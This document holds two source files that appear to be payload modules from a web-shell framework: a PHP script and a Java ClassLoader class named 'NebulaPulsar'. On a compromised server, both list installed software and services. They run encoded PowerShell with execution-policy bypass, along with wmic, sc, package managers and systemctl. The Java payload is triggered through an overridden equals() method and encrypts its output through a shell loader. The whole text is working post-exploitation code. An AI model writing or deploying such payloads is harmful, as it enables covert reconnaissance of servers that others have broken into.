File: Payload/PHP/v8.X/ECDH/app_serv.php
<?php

@ini_set('display_errors', '0');
@set_time_limit(0);

$win = (false !== strpos(strtolower(PHP_OS), 'win'));

function command_exists($cmd): bool {
    if (false !== strpos(strtolower(PHP_OS), 'win')) {
        $where = shell_exec("where {$cmd} 2>NUL");
        return !empty(trim((string)$where));
    }
    $return = shell_exec("which {$cmd} 2>/dev/null");
    return !empty($return);
}

function clean_value($v) {
    if ($v === null) return '';
    return trim((string)$v);
}

function get_windows_applications(): array {
    $apps = [];

    if (command_exists('powershell')) {
        $ps_script = '[Console]::OutputEncoding = [Text.Encoding]::UTF8; '
                   . 'Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall", "HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" -ErrorAction SilentlyContinue '
                   . '| ForEach-Object { try { Get-ItemProperty $_.PSPath -ErrorAction Stop } catch {} } '
                   . '| Where-Object DisplayName '
                   . '| Select-Object DisplayName, DisplayVersion, Publisher, InstallDate '
                   . '| ConvertTo-Json -Compress';

        $encoded_cmd = base64_encode(iconv('UTF-8', 'UTF-16LE', $ps_script));
        $raw_output  = shell_exec("powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand {$encoded_cmd} < NUL");

        if (!empty($raw_output)) {
            $clean_raw = str_replace("\x00", '', $raw_output);
            $clean_raw = preg_replace('/[\x00-\x1F\x7F\xEF\xBB\xBF]/', '', $clean_raw);

            $start = strpos($clean_raw, '[');
            $end   = strrpos($clean_raw, ']');

            if ($start !== false && $end !== false && $end > $start) {
                $json_str = substr($clean_raw, $start, $end - $start + 1);
                $data     = json_decode($json_str, true, 512, JSON_INVALID_UTF8_SUBSTITUTE);

                if (is_array($data)) {
                    $rows = isset($data[0]) && is_array($data[0]) ? $data : [$data];
                    foreach ($rows as $row) {
                        $name = clean_value($row['DisplayName'] ?? '');
                        if ($name !== '') {
                            $apps[] = [
                                'name'      => $name,
                                'version'   => clean_value($row['DisplayVersion'] ?? ''),
                                'vendor'    => clean_value($row['Publisher'] ?? ''),
                                'installed' => clean_value($row['InstallDate'] ?? ''),
                                'source'    => 'powershell_registry'
                            ];
                        }
                    }
                    if (!empty($apps)) return $apps;
                }
            }
        }
    }

    if (command_exists('wmic')) {
        $wmic_out = shell_exec('wmic product get Name,Version,Vendor,InstallDate /format:csv 2>NUL');
        if (!empty($wmic_out)) {
            $lines = explode("\n", trim($wmic_out));
            foreach ($lines as $line) {
                $line = trim($line);
                if (empty($line) || strspn($line, 'Node,') === 5) continue;

                $cols = explode(',', $line);
                if (count($cols) >= 5) {
                    $name = clean_value($cols[2] ?? '');
                    if ($name !== '') {
                        $apps[] = [
                            'name'      => $name,
                            'version'   => clean_value($cols[4] ?? ''),
                            'vendor'    => clean_value($cols[3] ?? ''),
                            'installed' => clean_value($cols[1] ?? ''),
                            'source'    => 'wmic'
                        ];
                    }
                }
            }
        }
    }

    return $apps;
}

function get_windows_services(): array {
    $services = [];

    if (command_exists('powershell')) {
        $ps_script = '[Console]::OutputEncoding = [Text.Encoding]::UTF8; '
                   . 'Get-Service | ForEach-Object { @{ N = $_.Name; D = $_.DisplayName; S = $_.Status.ToString(); M = $_.StartType.ToString() } } '
                   . '| ConvertTo-Json -Compress';

        $encoded_cmd = base64_encode(iconv('UTF-8', 'UTF-16LE', $ps_script));
        $raw_output  = shell_exec("powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand {$encoded_cmd} < NUL");

        if (!empty($raw_output)) {
            $clean_raw = str_replace("\x00", '', $raw_output);
            $clean_raw = preg_replace('/[\x00-\x1F\x7F\xEF\xBB\xBF]/', '', $clean_raw);

            $start = strpos($clean_raw, '[');
            $end   = strrpos($clean_raw, ']');

            if ($start !== false && $end !== false && $end > $start) {
                $json_str = substr($clean_raw, $start, $end - $start + 1);
                $data     = json_decode($json_str, true, 512, JSON_INVALID_UTF8_SUBSTITUTE);

                if (is_array($data)) {
                    $rows = isset($data[0]) && is_array($data[0]) ? $data : [$data];
                    foreach ($rows as $row) {
                        $name = clean_value($row['N'] ?? $row['Name'] ?? '');
                        if ($name !== '') {
                            $status_raw = strtolower(clean_value($row['S'] ?? $row['Status'] ?? ''));
                            $services[] = [
                                'name'         => $name,
                                'display_name' => clean_value($row['D'] ?? $row['DisplayName'] ?? ''),
                                'status'       => ($status_raw === 'running') ? 'running' : 'stopped',
                                'start_type'   => clean_value($row['M'] ?? $row['StartType'] ?? ''),
                                'source'       => 'powershell'
                            ];
                        }
                    }
                    if (!empty($services)) return $services;
                }
            }
        }
    }

    if (command_exists('wmic')) {
        $wmic_out = shell_exec('wmic service get Name,DisplayName,State,StartMode /format:csv 2>NUL');
        if (!empty($wmic_out)) {
            $lines = explode("\n", trim($wmic_out));
            foreach ($lines as $line) {
                $line = trim($line);
                if (empty($line) || strspn($line, 'Node,') === 5) continue;

                $cols = explode(',', $line);
                if (count($cols) >= 5) {
                    $name = clean_value($cols[2] ?? '');
                    if ($name !== '') {
                        $status_raw = strtolower(clean_value($cols[4] ?? ''));
                        $services[] = [
                            'name'         => $name,
                            'display_name' => clean_value($cols[1] ?? ''),
                            'status'       => ($status_raw === 'running') ? 'running' : 'stopped',
                            'start_type'   => clean_value($cols[3] ?? ''),
                            'source'       => 'wmic'
                        ];
                    }
                }
            }
            if (!empty($services)) return $services;
        }
    }

    if (command_exists('sc')) {
        $sc_out = shell_exec('sc query state= all type= service 2>NUL');
        if (!empty($sc_out)) {
            $curr_name = '';
            $curr_disp = '';
            $curr_stat = 'stopped';

            $lines = explode("\n", $sc_out);
            foreach ($lines as $line) {
                $line = trim($line);
                if (strpos($line, 'SERVICE_NAME:') === 0) {
                    if ($curr_name !== '') {
                        $services[] = [
                            'name'         => $curr_name,
                            'display_name' => $curr_disp ?: $curr_name,
                            'status'       => $curr_stat,
                            'start_type'   => 'unknown',
                            'source'       => 'sc'
                        ];
                    }
                    $curr_name = clean_value(substr($line, 13));
                    $curr_disp = '';
                    $curr_stat = 'stopped';
                } elseif (strpos($line, 'DISPLAY_NAME:') === 0) {
                    $curr_disp = clean_value(substr($line, 13));
                } elseif (strpos($line, 'STATE') === 0 && strpos($line, 'RUNNING') !== false) {
                    $curr_stat = 'running';
                }
            }
            
            if ($curr_name !== '') {
                $services[] = [
                    'name'         => $curr_name,
                    'display_name' => $curr_disp ?: $curr_name,
                    'status'       => $curr_stat,
                    'start_type'   => 'unknown',
                    'source'       => 'sc'
                ];
            }
        }
    }

    return $services;
}

function get_unix_like_applications(): array {
    $apps = [];

    if (command_exists('dpkg-query')) {
        $output = [];
        exec("dpkg-query -W -f='\${Package}\t\${Version}\t\${Maintainer}\n' 2>/dev/null", $output);
        foreach ($output as $line) {
            $parts = explode("\t", trim($line));
            if (count($parts) >= 2) {
                $apps[] = [
                    'name'    => clean_value($parts[0]),
                    'version' => clean_value($parts[1]),
                    'vendor'  => clean_value($parts[2] ?? ''),
                    'source'  => 'dpkg'
                ];
            }
        }
    }
    elseif (command_exists('rpm')) {
        $output = [];
        exec("rpm -qa --qf '%{NAME}\t%{VERSION}-%{RELEASE}\t%{VENDOR}\n' 2>/dev/null", $output);
        foreach ($output as $line) {
            $parts = explode("\t", trim($line));
            if (count($parts) >= 2) {
                $apps[] = [
                    'name'    => clean_value($parts[0]),
                    'version' => clean_value($parts[1]),
                    'vendor'  => clean_value($parts[2] ?? ''),
                    'source'  => 'rpm'
                ];
            }
        }
    }

    if (command_exists('brew')) {
        $output = [];
        exec("brew list --versions 2>/dev/null", $output);
        foreach ($output as $line) {
            $parts = explode(" ", trim($line));
            if (count($parts) >= 2) {
                $apps[] = [
                    'name'    => clean_value($parts[0]),
                    'version' => clean_value($parts[1]),
                    'vendor'  => 'Homebrew',
                    'source'  => 'homebrew'
                ];
            }
        }
    }

    if (command_exists('snap')) {
        $output = [];
        exec("snap list 2>/dev/null", $output);
        array_shift($output);
        foreach ($output as $line) {
            $cols = preg_split('/\s+/', trim($line));
            if (count($cols) >= 2) {
                $apps[] = [
                    'name'    => clean_value($cols[0]),
                    'version' => clean_value($cols[1]),
                    'vendor'  => clean_value($cols[4] ?? ''),
                    'source'  => 'snap'
                ];
            }
        }
    }

    return $apps;
}

function get_unix_like_services(): array {
    $services = [];

    if (command_exists('systemctl')) {
        $output = [];
        exec("systemctl list-units --type=service --all --no-pager --no-legend 2>/dev/null", $output);

        foreach ($output as $line) {
            $cols = preg_split('/\s+/', trim($line), 5);
            if (count($cols) >= 4) {
                $services[] = [
                    'name'         => clean_value(str_replace('.service', '', $cols[0])),
                    'display_name' => clean_value($cols[4] ?? $cols[0]),
                    'status'       => ($cols[2] === 'active') ? 'running' : 'stopped',
                    'source'       => 'systemd'
                ];
            }
        }
    }
    elseif (command_exists('service')) {
        $output = [];
        exec("service --status-all 2>/dev/null", $output);

        foreach ($output as $line) {
            if (preg_match('/\[\s*([\+\-\?])\s*\]\s+(.+)/', trim($line), $matches)) {
                $status_flag = $matches[1];
                $name        = trim($matches[2]);

                $services[] = [
                    'name'         => clean_value($name),
                    'display_name' => clean_value($name),
                    'status'       => ($status_flag === '+') ? 'running' : 'stopped',
                    'source'       => 'sysvinit'
                ];
            }
        }
    }
    elseif (command_exists('launchctl')) {
        $output = [];
        exec("launchctl list 2>/dev/null", $output);
        array_shift($output);

        foreach ($output as $line) {
            $cols = preg_split('/\s+/', trim($line), 3);
            if (count($cols) >= 3) {
                $pid   = $cols[0];
                $label = $cols[2];

                $services[] = [
                    'name'         => clean_value($label),
                    'display_name' => clean_value($label),
                    'status'       => ($pid !== '-' && is_numeric($pid)) ? 'running' : 'stopped',
                    'source'       => 'launchd'
                ];
            }
        }
    }

    return $services;
}

$result = [
    'success'     => false,
    'system_type' => $win ? 'windows' : 'unix_like',
    'os_raw'      => PHP_OS,
    'error'       => '',
    'data'        => [
        'applications' => [],
        'services'     => []
    ]
];

try {
    if ($win) {
        $result['data']['applications'] = get_windows_applications();
        $result['data']['services']     = get_windows_services();
    } else {
        $result['data']['applications'] = get_unix_like_applications();
        $result['data']['services']     = get_unix_like_services();
    }

    $result['success'] = true;

} catch (Exception $e) {
    $result['error'] = $e->getMessage();
}

header('Content-Type: application/json; charset=utf-8');
echo json_encode($result,
    JSON_PRETTY_PRINT |
    JSON_UNESCAPED_UNICODE |
    JSON_UNESCAPED_SLASHES
);

?>

File: Payload/JSP/NebulaPulsar(Java 8)/app_serv.java
import java.io.*;
import java.lang.reflect.Method;
import java.util.*;
import java.util.regex.*;
import java.nio.charset.StandardCharsets;

public class app_serv extends ClassLoader {

    public app_serv(ClassLoader objParent) { super(objParent); }
    public app_serv() { super(app_serv.class.getClassLoader()); }

    private boolean isWindows() {
        String os = System.getProperty("os.name").toLowerCase();
        return os.contains("win");
    }

    private boolean hasPowerShell() {
        try {
            Process p = new ProcessBuilder("powershell", "-Command", "Get-Host").start();
            return p.waitFor() == 0;
        } catch (Exception e) {
            return false;
        }
    }

    private boolean commandExists(String cmd) {
        try {
            String checkCmd = isWindows() ? "where " + cmd : "which " + cmd;
            Process p = new ProcessBuilder(isWindows() ? "cmd.exe" : "/bin/sh", isWindows() ? "/c" : "-c", checkCmd).start();
            return p.waitFor() == 0;
        } catch (Exception e) {
            return false;
        }
    }

    private String runPowerShell(String query) {
        try {
            String cmd = "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; " +
                         "$OutputEncoding = [System.Text.Encoding]::UTF8; " +
                         query + " | ConvertTo-Json -Depth 3 -Compress";
            
            ProcessBuilder pb = new ProcessBuilder("powershell", "-NoProfile", "-Command", cmd);
            pb.redirectErrorStream(true);
            Process p = pb.start();

            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream(), StandardCharsets.UTF_8));
            StringBuilder sb = new StringBuilder();
            String line;
            while ((line = reader.readLine()) != null) {
                sb.append(line);
            }
            p.waitFor();

            String result = sb.toString().trim();
            if (result.isEmpty()) return "[]";
            if (result.startsWith("{") && result.endsWith("}")) return "[" + result + "]";
            return result;
        } catch (Exception e) {
            return "[]";
        }
    }

    private List<String> runNativeCommand(String... cmdTokens) {
        List<String> output = new ArrayList<String>();
        try {
            ProcessBuilder pb = new ProcessBuilder(cmdTokens);
            pb.redirectErrorStream(true);
            Process p = pb.start();

            String charsetName = isWindows() ? System.getProperty("sun.jnu.encoding", "Big5") : "UTF-8";
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream(), charsetName));
            String line;
            while ((line = reader.readLine()) != null) {
                output.add(line);
            }
            p.waitFor();
        } catch (Exception e) {
            // ignore
        }
        return output;
    }

    private String getWindowsApplications(boolean canUsePS) {
        if (canUsePS) {
            String psQuery = "Get-ChildItem 'HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall', 'HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall' -ErrorAction SilentlyContinue " +
                             "| ForEach-Object { try { Get-ItemProperty $_.PSPath -ErrorAction Stop } catch {} } " +
                             "| Where-Object {$_.DisplayName} " +
                             "| Select-Object @{N='name';E={$_.DisplayName}}, @{N='version';E={$_.DisplayVersion}}, @{N='vendor';E={$_.Publisher}}, @{N='installed';E={$_.InstallDate}}, @{N='source';E={'powershell_registry'}}";
            String psRes = runPowerShell(psQuery);
            if (!psRes.equals("[]") && !psRes.isEmpty()) return psRes;
        }

        if (commandExists("wmic")) {
            List<String> lines = runNativeCommand("cmd.exe", "/c", "wmic product get Name,Version,Vendor,InstallDate /format:csv 2>NUL");
            StringBuilder json = new StringBuilder("[");
            boolean first = true;
            for (String line : lines) {
                line = line.trim();
                if (line.isEmpty() || line.startsWith("Node,")) continue;
                String[] cols = line.split(",");
                if (cols.length >= 5) {
                    String name = cols[2].trim();
                    if (!name.isEmpty()) {
                        if (!first) json.append(",");
                        json.append("{\"name\":\"").append(escapeJson(name)).append("\",")
                            .append("\"version\":\"").append(escapeJson(cols.length > 4 ? cols[4].trim() : "")).append("\",")
                            .append("\"vendor\":\"").append(escapeJson(cols.length > 3 ? cols[3].trim() : "")).append("\",")
                            .append("\"installed\":\"").append(escapeJson(cols.length > 1 ? cols[1].trim() : "")).append("\",")
                            .append("\"source\":\"wmic\"}");
                        first = false;
                    }
                }
            }
            json.append("]");
            return json.toString();
        }
        return "[]";
    }

    private String getWindowsServices(boolean canUsePS) {
        if (canUsePS) {
            String psQuery = "Get-Service | ForEach-Object { [PSCustomObject]@{ name = $_.Name; display_name = $_.DisplayName; status = if($_.Status -eq 'Running'){'running'}else{'stopped'}; start_type = $_.StartType.ToString(); source = 'powershell' } }";
            String psRes = runPowerShell(psQuery);
            if (!psRes.equals("[]") && !psRes.isEmpty()) return psRes;
        }

        if (commandExists("wmic")) {
            List<String> lines = runNativeCommand("cmd.exe", "/c", "wmic service get Name,DisplayName,State,StartMode /format:csv 2>NUL");
            StringBuilder json = new StringBuilder("[");
            boolean first = true;
            for (String line : lines) {
                line = line.trim();
                if (line.isEmpty() || line.startsWith("Node,")) continue;
                String[] cols = line.split(",");
                if (cols.length >= 5) {
                    String name = cols[2].trim();
                    if (!name.isEmpty()) {
                        if (!first) json.append(",");
                        String status = cols[4].trim().toLowerCase().equals("running") ? "running" : "stopped";
                        json.append("{\"name\":\"").append(escapeJson(name)).append("\",")
                            .append("\"display_name\":\"").append(escapeJson(cols[1].trim())).append("\",")
                            .append("\"status\":\"").append(status).append("\",")
                            .append("\"start_type\":\"").append(escapeJson(cols[3].trim())).append("\",")
                            .append("\"source\":\"wmic\"}");
                        first = false;
                    }
                }
            }
            json.append("]");
            if (lines.size() > 1) return json.toString();
        }

        if (commandExists("sc")) {
            List<String> lines = runNativeCommand("cmd.exe", "/c", "sc query state= all type= service 2>NUL");
            StringBuilder json = new StringBuilder("[");
            boolean first = true;
            String currName = "", currDisp = "", currStat = "stopped";

            for (String line : lines) {
                line = line.trim();
                if (line.startsWith("SERVICE_NAME:")) {
                    if (!currName.isEmpty()) {
                        if (!first) json.append(",");
                        json.append(buildServiceJson(currName, currDisp, currStat, "unknown", "sc"));
                        first = false;
                    }
                    currName = line.substring(13).trim(); currDisp = ""; currStat = "stopped";
                } else if (line.startsWith("DISPLAY_NAME:")) {
                    currDisp = line.substring(13).trim();
                } else if (line.startsWith("STATE") && line.toUpperCase().contains("RUNNING")) {
                    currStat = "running";
                }
            }
            if (!currName.isEmpty()) {
                if (!first) json.append(",");
                json.append(buildServiceJson(currName, currDisp, currStat, "unknown", "sc"));
            }
            json.append("]");
            return json.toString();
        }
        return "[]";
    }

    private String getUnixLikeApplications() {
        StringBuilder json = new StringBuilder("[");
        boolean first = true;

        if (commandExists("dpkg-query")) {
            List<String> lines = runNativeCommand("/bin/sh", "-c", "dpkg-query -W -f='${Package}\t${Version}\t${Maintainer}\n' 2>/dev/null");
            for (String line : lines) {
                String[] parts = line.trim().split("\t");
                if (parts.length >= 2) {
                    if (!first) json.append(",");
                    json.append(buildAppJson(parts[0], parts[1], parts.length > 2 ? parts[2] : "", "", "dpkg"));
                    first = false;
                }
            }
        } else if (commandExists("rpm")) {
            List<String> lines = runNativeCommand("/bin/sh", "-c", "rpm -qa --qf '%{NAME}\t%{VERSION}-%{RELEASE}\t%{VENDOR}\n' 2>/dev/null");
            for (String line : lines) {
                String[] parts = line.trim().split("\t");
                if (parts.length >= 2) {
                    if (!first) json.append(",");
                    json.append(buildAppJson(parts[0], parts[1], parts.length > 2 ? parts[2] : "", "", "rpm"));
                    first = false;
                }
            }
        }

        if (commandExists("brew")) {
            List<String> lines = runNativeCommand("/bin/sh", "-c", "brew list --versions 2>/dev/null");
            for (String line : lines) {
                String[] parts = line.trim().split(" ");
                if (parts.length >= 2) {
                    if (!first) json.append(",");
                    json.append(buildAppJson(parts[0], parts[1], "Homebrew", "", "homebrew"));
                    first = false;
                }
            }
        }

        if (commandExists("snap")) {
            List<String> lines = runNativeCommand("/bin/sh", "-c", "snap list 2>/dev/null");
            if (lines.size() > 1) lines.remove(0);
            for (String line : lines) {
                String[] cols = line.trim().split("\\s+");
                if (cols.length >= 2) {
                    if (!first) json.append(",");
                    json.append(buildAppJson(cols[0], cols[1], cols.length > 4 ? cols[4] : "", "", "snap"));
                    first = false;
                }
            }
        }

        json.append("]");
        return json.toString();
    }

    private String getUnixLikeServices() {
        StringBuilder json = new StringBuilder("[");
        boolean first = true;

        if (commandExists("systemctl")) {
            List<String> lines = runNativeCommand("/bin/sh", "-c", "systemctl list-units --type=service --all --no-pager --no-legend 2>/dev/null");
            for (String line : lines) {
                String[] cols = line.trim().split("\\s+", 5);
                if (cols.length >= 4) {
                    if (!first) json.append(",");
                    String name = cols[0].replace(".service", "");
                    String disp = cols.length > 4 ? cols[4] : cols[0];
                    String status = cols[2].equals("active") ? "running" : "stopped";
                    json.append(buildServiceJson(name, disp, status, "", "systemd"));
                    first = false;
                }
            }
        } else if (commandExists("service")) {
            List<String> lines = runNativeCommand("/bin/sh", "-c", "service --status-all 2>/dev/null");
            Pattern p = Pattern.compile("\\[\\s*([+\\-\\?])\\s*\\]\\s+(.+)");
            for (String line : lines) {
                Matcher m = p.matcher(line.trim());
                if (m.matches()) {
                    if (!first) json.append(",");
                    String status = m.group(1).equals("+") ? "running" : "stopped";
                    String name = m.group(2).trim();
                    json.append(buildServiceJson(name, name, status, "", "sysvinit"));
                    first = false;
                }
            }
        } else if (commandExists("launchctl")) {
            List<String> lines = runNativeCommand("/bin/sh", "-c", "launchctl list 2>/dev/null");
            if (lines.size() > 1) lines.remove(0);
            for (String line : lines) {
                String[] cols = line.trim().split("\\s+", 3);
                if (cols.length >= 3) {
                    if (!first) json.append(",");
                    String pid = cols[0];
                    String label = cols[2];
                    boolean isRunning = !pid.equals("-") && pid.matches("\\d+");
                    json.append(buildServiceJson(label, label, isRunning ? "running" : "stopped", "", "launchd"));
                    first = false;
                }
            }
        }

        json.append("]");
        return json.toString();
    }

    private String buildAppJson(String name, String ver, String vendor, String inst, String src) {
        return "{\"name\":\"" + escapeJson(name) + "\","
             + "\"version\":\"" + escapeJson(ver) + "\","
             + "\"vendor\":\"" + escapeJson(vendor) + "\","
             + "\"installed\":\"" + escapeJson(inst) + "\","
             + "\"source\":\"" + src + "\"}";
    }

    private String buildServiceJson(String name, String disp, String stat, String type, String src) {
        return "{\"name\":\"" + escapeJson(name) + "\","
             + "\"display_name\":\"" + escapeJson(disp.isEmpty() ? name : disp) + "\","
             + "\"status\":\"" + stat + "\","
             + "\"start_type\":\"" + escapeJson(type) + "\","
             + "\"source\":\"" + src + "\"}";
    }

    private String escapeJson(String input) {
        if (input == null) return "";
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < input.length(); i++) {
            char ch = input.charAt(i);
            switch (ch) {
                case '\\': sb.append("\\\\"); break;
                case '"':  sb.append("\\\""); break;
                case '\b': sb.append("\\b");  break;
                case '\f': sb.append("\\f");  break;
                case '\n': sb.append("\\n");  break;
                case '\r': sb.append("\\r");  break;
                case '\t': sb.append("\\t");  break;
                case '/':  sb.append("\\/");  break;
                default:
                    if (ch >= 0 && ch <= 0x1F) {
                        String ss = Integer.toHexString(ch);
                        sb.append("\\u");
                        for (int k = 0; k < 4 - ss.length(); k++) sb.append('0');
                        sb.append(ss.toUpperCase());
                    } else {
                        sb.append(ch);
                    }
            }
        }
        return sb.toString();
    }

    private String collectSystemData() {
        boolean isWin = isWindows();
        StringBuilder json = new StringBuilder();
        json.append("{\n");
        json.append("  \"success\": true,\n");
        json.append("  \"system_type\": \"" + (isWin ? "windows" : "unix_like") + "\",\n");
        json.append("  \"os_raw\": \"" + escapeJson(System.getProperty("os.name") + " (" + System.getProperty("os.version") + ")") + "\",\n");
        json.append("  \"error\": \"\",\n");
        json.append("  \"data\": {\n");
        
        if (isWin) {
            boolean canUsePS = hasPowerShell();
            json.append("    \"applications\": ").append(getWindowsApplications(canUsePS)).append(",\n");
            json.append("    \"services\": ").append(getWindowsServices(canUsePS)).append("\n");
        } else {
            json.append("    \"applications\": ").append(getUnixLikeApplications()).append(",\n");
            json.append("    \"services\": ").append(getUnixLikeServices()).append("\n");
        }
        
        json.append("  }\n");
        json.append("}");
        return json.toString();
    }

    private void fnWriteOutput(Object objParam, Object objResponse, OutputStream osClient, byte[] abResult) {
        if (abResult.length == 0)
            abResult = "DARKMATTER_SUCCESS: Action executed but returned no output".getBytes();
        Object objPageContext = objParam;
        try {
            byte[] abEncryptedResult = Encrypt(objParam, abResult);
            osClient.write(abEncryptedResult);
            osClient.flush();

            Method fnSetStatus = objResponse.getClass().getMethod("setStatus", new Class[]{int.class});
            fnSetStatus.invoke(objResponse, new Object[]{200});

            try {
                Method fnGetOut = objPageContext.getClass().getMethod("getOut", new Class[0]);
                Object objOut = fnGetOut.invoke(objPageContext, new Object[0]);
                Method fnClear = objOut.getClass().getMethod("clear", new Class[0]);
                fnClear.invoke(objOut, new Object[0]);
            } catch (Exception exIgnored) {}

            Method fnFlushBuffer = objResponse.getClass().getMethod("flushBuffer", new Class[0]);
            fnFlushBuffer.invoke(objResponse, new Object[0]);
        } catch (Exception exIgnored) {}
    }

    private byte[] Encrypt(Object objPageContext, byte[] abRawResponse) {
        try {
            if (objPageContext == null) return abRawResponse;
            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            Object objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);
            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPulsarLoader = fnGetAttribute.invoke(objRequest, new Object[]{"pulsar_loader_instance"});
            if (objPulsarLoader == null) return abRawResponse;
            Method fnCrypt = objPulsarLoader.getClass().getDeclaredMethod("Crypt", byte[].class, int.class);
            fnCrypt.setAccessible(true);
            return (byte[])fnCrypt.invoke(objPulsarLoader, abRawResponse, 1);
        } catch (Exception exCrashed) {
            return abRawResponse;
        }
    }

    @Override
    public boolean equals(Object objParam) {
        Object objPageContext = objParam;
        Object objResponse = null;
        try {
            Method fnGetResponse = objPageContext.getClass().getMethod("getResponse", new Class[0]);
            objResponse = fnGetResponse.invoke(objPageContext, new Object[0]);
            Method fnGetOutputStream = objResponse.getClass().getMethod("getOutputStream", new Class[0]);
            OutputStream osClient = (OutputStream) fnGetOutputStream.invoke(objResponse, new Object[0]);
            
            String currentData = collectSystemData();
            byte[] abResult = currentData.getBytes(StandardCharsets.UTF_8);
            
            fnWriteOutput(objPageContext, objResponse, osClient, abResult);
        } catch (Exception exIgnored) {}
        return true;
    }
}
